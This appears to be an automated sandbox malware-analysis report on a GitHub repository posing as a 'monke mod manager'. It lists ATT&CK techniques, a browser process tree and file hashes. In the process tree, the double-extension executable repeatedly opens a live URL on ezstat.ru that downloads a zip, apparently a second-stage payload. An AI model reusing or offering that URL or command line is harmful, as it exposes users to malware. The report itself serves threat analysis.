hxxps://github[.]com/domdaobfuscater/monke-mod-manger-v2[.]0

Analysis

max time kernel
146s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
03-02-2024 21:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/domdaobfuscater/monke-mod-manger-v2.0

Score

6^/10

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
56	raw.githubusercontent.com
55	raw.githubusercontent.com

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2744	msedge.exe
2744	msedge.exe
4940	msedge.exe
4940	msedge.exe
4412	identity_helper.exe
4412	identity_helper.exe
4720	msedge.exe
4720	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

pid	Process
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4940 wrote to memory of 2252	4940	msedge.exe	84
PID 4940 wrote to memory of 2252	4940	msedge.exe	84
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 4988	4940	msedge.exe	85
PID 4940 wrote to memory of 2744	4940	msedge.exe	86
PID 4940 wrote to memory of 2744	4940	msedge.exe	86
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87
PID 4940 wrote to memory of 4688	4940	msedge.exe	87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/domdaobfuscater/monke-mod-manger-v2.0
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd8cf346f8,0x7ffd8cf34708,0x7ffd8cf34718
  2⤵
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2
  2⤵
  PID:4988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
  2⤵
  PID:4688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:2476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:2736
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  PID:4416
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
  2⤵
  PID:1016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:1724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
  2⤵
  PID:3428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
  2⤵
  PID:3924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5420 /prefetch:8
  2⤵
  PID:396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
  2⤵
  PID:1840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:2248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
  2⤵
  PID:3644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
  2⤵
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
  2⤵
  PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6768 /prefetch:1
  2⤵
  PID:5148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
  2⤵
  PID:5364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
  2⤵
  PID:5452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:1
  2⤵
  PID:5532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
  2⤵
  PID:5616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
  2⤵
  PID:5636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
  2⤵
  PID:4160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
  2⤵
  PID:6112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,13155475174530531495,16957677720360627546,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6508 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2576

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:464

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2944

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\Temp1_monke mod manger v2.zip\monke mod manger v2\monke mod manger v2.exe.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_monke mod manger v2.zip\monke mod manger v2\monke mod manger v2.exe.exe"
1⤵
PID:2844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ezstat.ru/2P6bR4.zip
  2⤵
  PID:4656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd8cf346f8,0x7ffd8cf34708,0x7ffd8cf34718
    3⤵
    PID:3268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ezstat.ru/2P6bR4.zip
  2⤵
  PID:4516
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd8cf346f8,0x7ffd8cf34708,0x7ffd8cf34718
    3⤵
    PID:4000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ezstat.ru/2P6bR4.zip
  2⤵
  PID:220
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd8cf346f8,0x7ffd8cf34708,0x7ffd8cf34718
    3⤵
    PID:684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ezstat.ru/2P6bR4.zip
  2⤵
  PID:4092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0x9c,0x124,0x7ffd8cf346f8,0x7ffd8cf34708,0x7ffd8cf34718
    3⤵
    PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ezstat.ru/2P6bR4.zip
  2⤵
  PID:4544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd8cf346f8,0x7ffd8cf34708,0x7ffd8cf34718
    3⤵
    PID:1436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d5564ccbd62bac229941d2812fc4bfba

SHA1
0483f8496225a0f2ca0d2151fab40e8f4f61ab6d

SHA256
d259ff04090cbde3b87a54554d6e2b8a33ba81e9483acbbe3e6bad15cbde4921

SHA512
300cda7933e8af577bdc1b20e6d4279d1e418cdb0571c928b1568bfea3c231ba632ccb67313ae73ddeae5586d85db95caffaedd23e973d437f8496a8c5a15025

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

Filesize
20KB

MD5
725a47144d09a60511f1e6e092c4f3ec

SHA1
1d33abca47326a1c38cac103c24037286c070caa

SHA256
3d50cd70dd62d7b1fc35c31e95190853426a2cece901bc184689fc4dfea9e55e

SHA512
496d0a786e4253a63b8531da2f601d08db361a16ada894469a303b5355076cddf93eecfabe02cf636400c0aaf354c9d6b0ee259dc8e04e052944fb7ae91cea53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

Filesize
16KB

MD5
602a1027f096e715787e5ee2507b7aae

SHA1
3bf83ab3c7484afddc8461b17248465a56a4333e

SHA256
9628e180f833bd91817044626be3739b6514493e2612eeb341ecd43381094c3c

SHA512
46713296ec4d37ea761510bae37328c7ead8e9f30a951f910c981d90e32d0c8c052e1173e041583e720d733936ca2ae05c3e71c0bcd7d803c7b4d20f72e93bcb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
20KB

MD5
87e8230a9ca3f0c5ccfa56f70276e2f2

SHA1
